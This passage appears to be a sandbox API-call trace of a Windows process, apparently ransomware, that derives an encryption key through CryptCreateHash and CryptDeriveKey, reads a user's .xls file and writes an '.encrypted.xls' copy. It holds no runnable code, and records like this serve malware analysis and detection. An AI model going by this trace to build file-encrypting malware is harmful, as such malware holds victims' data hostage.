lpsz="_CRYPT_STARTUP") returned 0xe [0031.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0031.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0031.429] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.429] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0031.429] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0031.429] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0031.429] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.429] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0031.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0031.429] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.429] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0031.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0031.429] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.429] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.430] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.430] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0031.430] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.430] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0031.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0031.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0031.430] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.430] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.430] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0031.430] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.430] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0031.430] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.430] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.430] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0031.430] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.430] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.430] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0031.431] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.431] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.431] CryptHashData (hHash=0x7c2240, pbData=0x7c7758, dwDataLen=0x100, dwFlags=0x1) returned 1 [0031.431] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.431] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0031.431] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.431] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0031.431] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.431] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0031.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0031.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0031.431] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.431] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.431] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0031.431] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.431] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c22c0 | out: hHeap=0x770000) returned 1 [0031.431] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.431] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.431] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.431] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0031.431] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0031.431] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.432] CryptDestroyHash (hHash=0x7c2240) returned 1 [0031.432] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.432] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.432] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0031.432] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0031.432] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.432] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\lk15vz5k\\r99f_hog0ivxg.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0031.432] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.432] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0031.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0031.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0031.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0031.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0031.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0031.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0031.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0031.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0031.432] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0031.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0031.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0031.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0031.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0031.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0031.432] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.433] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0031.433] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0031.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0031.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0031.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0031.433] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0031.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0031.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0031.433] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0031.433] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0031.433] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0031.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0031.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0031.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0031.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0031.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0031.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0031.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0031.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0031.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0031.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0031.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0031.433] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0031.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0031.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0031.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd0) returned 0x791190 [0031.433] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0031.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0031.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0031.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0031.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x791190 | out: hHeap=0x770000) returned 1 [0031.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0031.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0031.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0031.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0031.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0031.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0031.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0031.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0031.434] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\lk15vz5k")) returned 0x10 [0031.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0031.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0031.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0031.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0031.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0031.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0031.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0031.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0031.434] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.encrypted.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\lk15vz5k\\r99f_hog0ivxg.encrypted.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0031.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0031.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0031.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0031.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0031.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0031.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0031.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0031.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0031.435] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0031.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0031.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0031.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0031.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0031.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0031.435] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0031.435] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0031.435] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0031.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0031.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0031.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0031.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0031.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0031.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0031.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0031.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0031.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0031.436] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0031.436] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0xf4c4, lpOverlapped=0x0) returned 1 [0031.438] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0031.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0031.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0031.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xf4c4) returned 0x955018 [0031.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0031.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0031.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0031.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0031.439] 